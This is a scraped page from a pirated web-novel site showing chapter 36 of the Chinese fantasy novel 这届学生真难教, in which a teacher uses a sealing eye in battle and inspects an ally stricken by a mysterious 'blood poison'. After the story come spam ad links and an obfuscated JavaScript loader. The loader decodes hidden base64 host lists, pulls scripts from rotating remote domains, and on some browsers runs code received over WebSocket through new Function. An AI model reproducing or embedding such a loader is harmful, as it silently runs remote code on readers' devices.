笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 这届学生真难教 > 第三十六章:诡异的血毒

第三十六章:诡异的血毒

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“这不是沙暴送葬么...”
  看到天空之中,砂砾组成的圆球不断地往外渗着血液,张吏都不用想就知道,陶正此刻已经被砂砾碾成了肉泥。
  如果有这半兽化的支撑,或许他还能强行破开这道束缚,然而没有了异能,光凭着星辰之力带来的加成就想要对抗和自己平阶的迟空,这显然是不现实的。
  而经过这一次,张吏也知道了自己右眼此时的极限。
  六阶,十秒钟。
  自己现在不过是个四阶的适能者,竟然能够跨越两阶强行封印对方的异能十秒,可见自己右眼的异能有多么的恐怖了。
  “等我升到五阶,六阶甚至是七阶呢...”捂着右眼,张吏此刻的情况也不是很好,封印六阶强者的反噬还在,张吏只觉得自己的脑袋有点发昏。
  不过这依然不影响他现在的兴奋,张吏明白,现在的自己,已经不是之前那个没有一点战斗能力的辅助了!
  而在战场之中,解决掉了陶正之后,半空中的流沙便突然失去了力量,散落在了地面上,那三股沙暴龙卷,也是在失去了迟空的控制之下,缓缓消散。
  此时的迟空,早已经到达了极限,血毒的恐怖力量,几乎是让他每一刻都生不如死,而强行爆发出自己的异能,更是加快了血毒的运转。
  迟空现在整个人就像是一只煮熟的大虾一般,弯曲着身子无力的倒在了沙滩上面,而他的身上,则是不断地冒着阵阵蒸汽,如果凑近看的话,还会发现,这股蒸汽的颜色竟然是红色的!
  快步跑到迟空面前,张吏发现,迟空已经陷入了昏迷状态,而他的身体,也开始往外渗血,但体表的温度极高,要不了多久,迟空的大脑和身体机能就会被完全烧坏的。
  “这到底是什么鬼东西。”
  之前两人的话语张吏也听到了,陶正说这东西好像是叫什么血毒。
  但张吏只是一个默默无闻的语文...适能者老师,他两世为人可从来都没有学习过解毒啊,面对这个状态,张吏一时间也不知道该怎么办才好。
  ‘不管怎么样,先看看再说吧...三重洞察,开!’
  最终,张吏还是将希望放在了自己的异能上面,光从外表来看,张吏除了惊骇之外根本看不出来该怎么办,但通过异能看看内部,说不定能够找到解决的办法。
  幽蓝色的荧光冒出,瞬间,世界变成了黑白色,只有面前的迟空,身上还保持着属于自己的颜色。
  此时,迟空的魂景已经被黑色笼罩了,仿佛是星辰大海之中出现了一个黑洞,正在源源不断的吸收着周围的星辰一般。
  随着黑色领域的扩张,一股股的热量也随之从魂景之中传递到了迟空的身体各处,甚至就连迟空的精神也不例外。
  “原来这就是血毒!”看到这里,张吏猛地想到了什么。“本来以为血毒是一种流传在血液中的毒素,现在看来,血毒竟然是能够影响到魂景的存在!”
  张吏此刻终于明白了,为什么迟空身体的每一个地方都会不断地升温。
免费看片APP    美女直播间
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x6a\x58\x73\x4d\x4b\x72\x4d\x57\x79']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vc2tkamZrZGwza2wuc2hwcm91ZC5jbb20=','d3NzOOi8vd3MuZ2VuZ2Z1cXVhbi5jb206OOTE5MSx3c3M6Ly93cy5xb3Jvc21hbGwuY29tOOjkxOOTEsd3NzOOi8vd3Mud2VpeGlzaXdhbmcuY29tOOjkxOOTE=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《这届学生真难教》
打开
浏览器
继续